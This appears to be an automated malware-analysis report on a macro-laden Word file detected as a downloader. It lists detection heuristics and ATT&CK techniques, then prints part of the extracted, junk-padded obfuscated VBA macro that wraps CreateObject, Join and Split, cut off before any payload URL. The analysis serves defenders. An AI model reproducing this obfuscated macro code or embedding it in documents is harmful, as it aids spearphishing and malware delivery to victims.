MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions upon opening. Heuristics indicate the use of CreateObject, suggesting the execution of arbitrary code. The ClamAV detection name 'Doc.Downloader.Logan-9781905-0' strongly implies a downloader functionality, likely to fetch and execute a second-stage payload. The obfuscated nature of the VBA code further supports this assessment.
Heuristics 6
-
ClamAV: Doc.Downloader.Logan-9781905-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18825 bytes |
SHA-256: da30aa94b28f995ffc9559eca817f363ffff3144f68117c4ed25ccf38eb07712 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "A0qw88jfmftj"
Function A3j299fve06lt5(Ck5bsno1zt6awrt)
On Error Resume Next
Set ysTFeT = VhmwHC
Dim gDdmQGIOB(8 + 8 + 1 + 4) As String
gDdmQGIOB(QAplHkeJG) = (793 + 6)
XkaRA = iFHED
gDdmQGIOB(QAplHkeJG) = (eCYTAhBPC + 6475)
gDdmQGIOB(QAplHkeJG) = (5 + 99 + tNPPGEA)
Set GfnHk = sOKDC
Dim iVwUl(6 + 6 + 1 + 8) As String
iVwUl(ihDsFFSJA) = (8714 + 3010)
sAPoBA = nQjyzfCCc
iVwUl(ihDsFFSJA) = (RRcDYbID + 9392)
iVwUl(ihDsFFSJA) = (5 + 888 + UceADHfrB)
Set hxKakJ = tCAbIEd
Dim EQBZlAGFy(6 + 7 + 1 + 8) As String
EQBZlAGFy(goptn) = (9 + 6794)
YHxkhHBFp = nXJpG
EQBZlAGFy(goptn) = (yyNTWpBA + 4)
EQBZlAGFy(goptn) = (6 + 25 + DSSbGBIC)
A3j299fve06lt5 = Join(Ck5bsno1zt6awrt, Wbyxeyx9p0p)
Set wdRjjJQF = ssDwDNdK
Dim QrPpxWD(7 + 6 + 1 + 6) As String
QrPpxWD(TVmUC) = (37 + 46)
jMoTBT = QNmKFJJ
QrPpxWD(TVmUC) = (PApkUG + 906)
QrPpxWD(TVmUC) = (940 + 129 + rMmzJEG)
Set UnZuRinn = BaUIFI
Dim QCWGc(6 + 8 + 1 + 7) As String
QCWGc(HSADYuI) = (7 + 7)
KbIomNBFq = DmOJFCPSA
QCWGc(HSADYuI) = (AOYXO + 33)
QCWGc(HSADYuI) = (3 + 154 + FKGCJoAJ)
Set uxfmILHuB = XsUjBHJ
Dim CKTMEH(6 + 5 + 1 + 5) As String
CKTMEH(cJKjKAY) = (3587 + 8)
gFeBEEOHI = lVzkInJB
CKTMEH(cJKjKAY) = (WlrbJH + 361)
CKTMEH(cJKjKAY) = (95 + 887 + LxaeC)
End Function
Function Xxu9xp67tuoeumtl(Acdp6rpmgq6prk50)
On Error Resume Next
Set jIdgIA = gysoDFU
Dim JHRaBF(6 + 6 + 1 + 8) As String
JHRaBF(lQQGp) = (6 + 48)
dwdaOiH = aUIhAGSF
JHRaBF(lQQGp) = (KQAFIF + 5)
JHRaBF(lQQGp) = (63 + 8 + xaNQAOf)
Set bfOIkvC = VweUI
Dim KbDJH(8 + 6 + 1 + 5) As String
KbDJH(WyWjnXAPC) = (26 + 8)
pGnIE = tmmZR
KbDJH(WyWjnXAPC) = (gNtGlGD + 2)
KbDJH(WyWjnXAPC) = (3 + 768 + bwBXCnDF)
Set zFPoAU = QdqpGGY
Dim mUMutMmBE(8 + 5 + 1 + 4) As String
mUMutMmBE(MFIQc) = (3 + 506)
vSfDHJpAD = shHmTdByC
mUMutMmBE(MFIQc) = (RQSQY + 5258)
mUMutMmBE(MFIQc) = (7 + 326 + YAiiGGaIw)
Set Xxu9xp67tuoeumtl = CreateObject(Acdp6rpmgq6prk50)
Set PnJNGD = HuzlVT
Dim QSGkhYDl(6 + 5 + 1 + 7) As String
QSGkhYDl(xVlti) = (1457 + 103)
wloMAFbD = mlVcLJE
QSGkhYDl(xVlti) = (UdjVcDI + 579)
QSGkhYDl(xVlti) = (1806 + 8 + paCtQ)
Set UyQuCCIIk = XdnLHK
Dim WyoYoGAI(7 + 5 + 1 + 7) As String
WyoYoGAI(ucsIGp) = (8 + 7)
hYWDo = zBEQaB
WyoYoGAI(ucsIGp) = (uOovD + 4)
WyoYoGAI(ucsIGp) = (1 + 8 + rQraB)
Set mdLTHS = rdLckC
Dim WSIcIEFT(6 + 8 + 1 + 7) As String
WSIcIEFT(cVtEIGBJ) = (8 + 3713)
vgHgDxkCH = nwFVA
WSIcIEFT(cVtEIGBJ) = (mamvGHGZx + 763)
WSIcIEFT(cVtEIGBJ) = (4 + 1 + InoiHi)
End Function
Function Wb5ececqr26b(U0wuyrvvt463)
On Error Resume Next
Set xEREA = zNfVpACZJ
Dim QGBcEIC(8 + 7 + 1 + 6) As String
QGBcEIC(MCAFCHmQ) = (9271 + 1)
tFaCY = KFhkw
QGBcEIC(MCAFCHmQ) = (IKQxI + 749)
QGBcEIC(MCAFCHmQ) = (1 + 12 + ZeFrs)
Set JsJlu = DSVADGyC
Dim iSEPJ(7 + 6 + 1 + 8) As String
iSEPJ(rxlbDFfQ) = (7 + 4)
qiGkF = DdZSLBJJM
iSEPJ(rxlbDFfQ) = (yQGABD + 16)
iSEPJ(rxlbDFfQ) = (2150 + 4 + WITxQSC)
Set BsOmYj = ukzdIS
Dim SRFEIWGAI(8 + 8 + 1 + 8) As String
SRFEIWGAI(DXGEA) = (637 + 4)
JhpnAP = BTINH
SRFEIWGAI(DXGEA) = (oPGmPafn + 464)
SRFEIWGAI(DXGEA) = (65 + 6811 + GqKvAx)
Wb5ececqr26b = Split(U0wuyrvvt463, "=PO32")
Set RrkdIHC = FlXQCDFX
Dim IobhFeF(8 + 5 + 1 + 5) As String
IobhFeF(nSOBg) = (5 + 4)
RlWCBRHG = ieDsiDBC
IobhFeF(nSOBg) = (GOqlIF + 3)
IobhFeF(nSOBg) = (2 + 84 + ecQaEyEOR)
Set NeREBDFdt = aJllzA
Dim vOxAQOFBA(5 + 7 + 1 + 6) As String
vOxAQOFBA(xlegt) = (446 + 270)
JYAcBA = SFEcJG
vOxAQOFBA(xlegt) = (EMLUPRRBD + 1)
vOxAQOFBA(xlegt) = (6374 + 1 + IJKBzC)
Set zuzXGxInI = hyrBonVDg
Dim KWghkk(7 + 6 + 1 + 4) As String
KWghkk(mFYenuCr) = (680 + 4)
lvamaHBk = yvGTC
KWghkk(mFYenuCr) = (yryMyA + 9)
KWghkk(mFYenuCr) = (9 + 28 + JnbuiJI)
End Function
Attribute VB_Name = "Xfz7gu6iysst4bk"
Attribute VB_Base = "0{EBE7B244-872C-40E7-A6F5-10D638D9F413}{BAD28B56-127A-4DDF-AE1D-5CADEC5F02F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Fun
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.